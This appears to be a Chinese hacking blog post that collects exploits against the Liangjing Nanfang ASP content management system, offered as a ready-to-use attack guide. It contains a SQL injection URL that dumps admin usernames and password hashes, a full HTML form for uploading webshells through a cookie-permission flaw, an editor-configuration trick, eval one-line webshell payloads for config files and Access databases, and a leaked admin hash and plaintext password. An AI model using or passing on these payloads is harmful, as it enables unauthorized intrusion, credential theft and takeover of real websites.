精良南方漏洞总汇

情话
情话
情话
42
文章
2
评论
2018年12月1日07:44:33 评论 15.4K 1880字阅读6分16秒
广告也精彩

精良南方漏洞总汇精良南方漏洞总汇

1.存在0day漏洞,没有防注入的情况下,在网站后面加上这段代码可以直接爆出帐号密码

NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='

目标站:http://***.com/
admin|f88cac7b90adab28
2.存在南方数据编辑器(southidceditor)
默认路径:admin/southidceditor/admin_style.asp
通过改样式允许的后缀类型:asaspp 来上传木马拿shell
漏洞页面:admin/Southidceditor/ewebeditor.asp?id=57&style=southidc
目标站:http://***.com/

3.通过upfile_other.asp漏洞文件直接取SHELL
直接访问userreg.asp进行注册会员,登录并在未退出登录的状态下,使用本地上传文件进行上传,代码如下:

<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<STYLE type=text/css>BODY {
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
}
.tx1 {
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
}
</STYLE>

<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
<BODY leftMargin=0 topMargin=0>
<FORM name=form1 action="http://www.baidu.com/upfile_Other.asp"; method=post
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit>
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>

 

将以上代码保存为html格式,替换代码中的网址,利用火狐浏览器的保留cookies功能来拿shell,第一个框里选择图片文件,第二个框选择cer、asa、asp等文件上传!良精南方程序的会员cookies就具有上传脚本文件的权限,说明过滤验证不成熟,这是一个致命的权限漏洞!
目标站:http://***.com/

4.在网站配置任意处插入闭合一句话木马:"%><%eval request("g")%><%s="
连接配置文件:inc/config.asp 密码:g
目标站:http://www.***.cn/
帐号:admin 密码:wbwwcg499578

5.在网站配置的“允许的上传文件类型”处增加上传“cer“等被服务器可解析的文件类型,再上传对应格式的木马就可以了!

6.本方法适用于access数据库,只要在access数据库任何地方插入:┼攠數畣整爠煥敵瑳∨≡┩> 再把备份名成asp或者asa,访问这个asp或asa,就是一句话木马。密码a

继续阅读
广告也精彩
情话
  • 本文由 发表于 2018年12月1日07:44:33
  • 除非特殊声明,本站文章均为原创,转载请务必保留本文链接
渗透经验分享之文件操作漏洞拓展 渗透笔记

渗透经验分享之文件操作漏洞拓展

上文分享了注入相关的东西,注入也可以对文件进行操作,本文是对文件操作漏洞的拓展。 文件操作漏洞 文件上传 文件读取 文件写入 文件删除 文件包含 一般java的站点存在文件系列的洞比较多(除了文件包含...
渗透经验分享之SQL注入思路拓展 渗透笔记

渗透经验分享之SQL注入思路拓展

写在文前 从实习到现在,因为从事打点工作的原因,实战经验积累了很多,就想写一些自己在实战中碰到的问题,以及自己的解决方法,因为保密的原因大多数不提供复现环境和截图,权当对渗透思路的一个拓展吧。可能会多...
对某ddos页端更深层次漏洞分析篇+漏洞利用篇 技术园

对某ddos页端更深层次漏洞分析篇+漏洞利用篇

我只负责说一下,怎么修你们自己研究吧! 来自某位不知名的群友说的,具体自测反正我知道有sql注入漏洞,其他未经证实不好说! 我转发一下再说一下我自己观点! 正文 群友原文 首先如图,我们看到这位群友输...
广告也精彩
匿名

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: